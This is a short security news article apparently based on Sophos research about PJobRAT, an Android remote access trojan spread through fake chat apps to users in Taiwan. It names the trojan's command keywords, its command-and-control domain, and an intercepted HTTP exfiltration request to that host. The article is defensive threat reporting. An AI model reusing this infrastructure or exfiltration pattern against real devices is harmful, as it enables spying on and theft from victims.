PJobRAT, an Android Remote Access Trojan (RAT) first observed in 2019, has recently resurfaced with enhanced capabilities and a refined targeting strategy.
The malware, initially documented targeting Indian military personnel in 2021, has evolved to compromise users in Taiwan through sophisticated social engineering tactics.
By masquerading as legitimate dating and instant messaging applications, PJobRAT entices unsuspecting victims to download malicious apps from compromised websites.
.png
)
The threat actor behind this operation demonstrates persistence and adaptability, with the latest campaign running for approximately 22 months from early 2023 through October 2024.
Distribution primarily occurred through WordPress sites hosting fake messaging apps such as “SaangalLite” (possibly mimicking SignalLite) and “CChat,” which impersonated a formerly legitimate application.
.webp)
The relatively small infection footprint suggests highly targeted attacks rather than widespread campaigns.
Sophos researchers identified significant technical improvements in the latest PJobRAT variants.
The malware maintains its core functionality of exfiltrating sensitive information including SMS messages, contacts, device details, and media files, but now features enhanced command execution capabilities.
This evolution dramatically expands the threat actor’s control over compromised devices.
Infection
Once installed, the malicious applications present users with basic chat functionality, creating an illusion of legitimacy while covertly establishing persistence.
The apps request extensive permissions, including exemption from battery optimization to ensure continuous background operation.
.webp)
The malware’s communication infrastructure employs a dual-channel approach for maximum resilience.
Firebase Cloud Messaging (FCM) serves as the primary command channel, enabling the threat actor to trigger various functions through predefined commands like “ace_am_ace” (upload SMS), “chall” (run shell command), and “kontak” (upload contacts).
This method cleverly conceals malicious traffic within expected Android communication patterns.
Secondary HTTP-based communication handles data exfiltration to the command-and-control server (westvist[.]myftp[.]org).
This channel transmits stolen information using multipart form requests, as demonstrated in the following intercepted traffic:-
POST /m_chowa_srv/main.php HTTP/1.1
Content-Type: multipart/form-data; boundary=a3c1b36e-3ce6-4117-8ed1-7af403ad1023
Content-Length: 1336
Host: westvist.myftp.org:3574
Connection: Keep-Alive
User-Agent: okhttp/4.10.0While this specific campaign appears to have concluded, the continued evolution of PJobRAT highlights the persistent threat posed by sophisticated mobile malware targeting high-value individuals.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free
